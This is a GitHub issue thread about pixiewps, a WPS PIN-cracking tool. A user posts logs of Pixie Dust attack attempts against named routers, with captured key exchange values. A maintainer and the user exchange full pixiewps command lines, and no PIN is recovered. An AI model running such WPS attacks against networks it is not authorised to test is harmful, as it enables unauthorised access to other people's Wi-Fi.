wiire-a / pixiewps

An offline Wi-Fi Protected Setup brute-force utility

Help #116

Closed MohamedWn closed 1 week ago

MohamedWn commented 1 week ago

Hi, I'm always getting stuck like this on all models of this router: it grabs all the needed data but won't crack it.

[*] Running wpa_supplicant…
[*] Running wpa_supplicant…
[*] Trying PIN '12345670'…
[*] Scanning…
[*] Associating with AP…
[+] Associated with 34:E8:94:C0:91:70 (ESSID: TT-MBK)
[*] Scanning…
[*] Associating with AP…
[+] Associated with 34:E8:94:C0:91:70 (ESSID: TT-MBK)
[*] Sending EAPOL Start…
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[P] E-Nonce: 338158F970F85DD941D98B803155A246
[*] Sending WPS Message M2…
[P] PKR: 69614D1C3A3F7D1CC78B297F7DAA40630E2A7A580C6DD3FDED8FF9B3FE47BA6B746B34F73E68540B832157A5E047FE37FDC67572306407EA299D74D75C1BBEA9EC6A50E2BFC41F6CEEFCF1D9C40BF232E0FE68CEFFE8B2E96C85BFB5803C6A428FE007511BE69518CD9E8087D144C06BBD0267972F98A9DC762B62421CF113719BD1CB65D65EEEF0ECBC6E8436EA4DDA9C98389F17F84E6ED11EE566EF71644645CA3C3F34A8F2523C3AF72818452893C23D602B88EAF15F6ECEF5C3E69892F3
[P] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
[P] AuthKey: 4F9DB5A924D5A7E1891A2B4850FFDAC8D568A3DEB747A2A5F88A79D11FFEDDE3
[*] Received WSC NACK
[-] Error: wrong PIN code
[!] Not enough data to run Pixie Dust attack

rofl0r commented 1 week ago

you lack e-hash1 and e-hash2

rofl0r commented 1 week ago

reproducer:

pixiewps -r 69614D1C3A3F7D1CC78B297F7DAA40630E2A7A580C6DD3FDED8FF9B3FE47BA6B746B34F73E68540B832157A5E047FE37FDC67572306407EA299D74D75C1BBEA9EC6A50E2BFC41F6CEEFCF1D9C40BF232E0FE68CEFFE8B2E96C85BFB5803C6A428FE007511BE69518CD9E8087D144C06BBD0267972F98A9DC762B62421CF113719BD1CB65D65EEEF0ECBC6E8436EA4DDA9C98389F17F84E6ED11EE566EF71644645CA3C3F34A8F2523C3AF72818452893C23D602B88EAF15F6ECEF5C3E69892F3 -e D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B -n 338158F970F85DD941D98B803155A246 -a 4F9DB5A924D5A7E1891A2B4850FFDAC8D568A3DEB747A2A5F88A79D11FFEDDE3

MohamedWn commented 1 week ago

reproducer:

pixiewps -r 69614D1C3A3F7D1CC78B297F7DAA40630E2A7A580C6DD3FDED8FF9B3FE47BA6B746B34F73E68540B832157A5E047FE37FDC67572306407EA299D74D75C1BBEA9EC6A50E2BFC41F6CEEFCF1D9C40BF232E0FE68CEFFE8B2E96C85BFB5803C6A428FE007511BE69518CD9E8087D144C06BBD0267972F98A9DC762B62421CF113719BD1CB65D65EEEF0ECBC6E8436EA4DDA9C98389F17F84E6ED11EE566EF71644645CA3C3F34A8F2523C3AF72818452893C23D602B88EAF15F6ECEF5C3E69892F3 -e D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B -n 338158F970F85DD941D98B803155A246 -a 4F9DB5A924D5A7E1891A2B4850FFDAC8D568A3DEB747A2A5F88A79D11FFEDDE3

Sorry, but in this example it can get e-h1 and e-h2 like this:

[*] Running wpa_supplicant…
[*] Running wpa_supplicant…
[*] Trying PIN '12345670'…
[*] Scanning…
[*] Associating with AP…
[*] Scanning…
[*] Associating with AP…
[+] Associated with B4:B0:24:23:68:A0 (ESSID: TOPNET_68A0)
[*] Sending EAPOL Start…
[*] Received Identity Request
[*] Sending Identity Response…
[*] Received WPS Message M1
[P] E-Nonce: 77B626BE57A9C15849D4A55E27B4E430
[*] Sending WPS Message M2…
[P] AuthKey: 34E63BA461FBAC92ACE3BF0FD5BCBE3EE2226159418587DBA1A0FA4652BF88F8
[*] Received WPS Message M3
[P] E-Hash1: 98730E0DF0BAA33B797D2CEC7B52501886D94DB1F71CA44399EE053688A3CAC1
[P] E-Hash2: 3EFFA839717416AA97AE1502E70608E5B4AA7938659EC19C7F486B8F821B2D05
[*] Sending WPS Message M4…
[*] Received WSC NACK
[-] Error: wrong PIN code
[*] Running Pixiewps…

pixiewps --pke D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B --pkr 5B4F776EE18CCD28FAD13F750ECDFB5DDEF380F4B779CEF963470AAE687AB23705747359F41291BF6C0E64BABD91234800ACCBD57F3AE288924D0538078D35FD5D1C20F36360F3B46EB707A7EC677A7B4502DB9DA26F2262286DCD67CCF1CB8B85D628C1848804DDACDAB24FB801580CA6D9F63B83F6DB6D9DF1E1BBB94B1B881FB29C2A31E8C3D587166426D0857B17A854C2DD33410D3AA7DBFF4E5F1A5D2E5137EA8DA78492FBD2614B1DE955E3FA3EF8F56F41E51BDECE81C5F6EC808335 --e-hash1 98730E0DF0BAA33B797D2CEC7B52501886D94DB1F71CA44399EE053688A3CAC1 --e-hash2 3EFFA839717416AA97AE1502E70608E5B4AA7938659EC19C7F486B8F821B2D05 --authkey 34E63BA461FBAC92ACE3BF0FD5BCBE3EE2226159418587DBA1A0FA4652BF88F8 --e-nonce 77B626BE57A9C15849D4A55E27B4E430

Pixiewps 1.4

[-] WPS pin not found!

[*] Time taken: 0 s 70 ms

[!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.

rofl0r commented 1 week ago

that just means that either the AP isn't vulnerable, or nobody has figured out yet why it doesn't work with that (or similar) models/fw combinations. bad luck.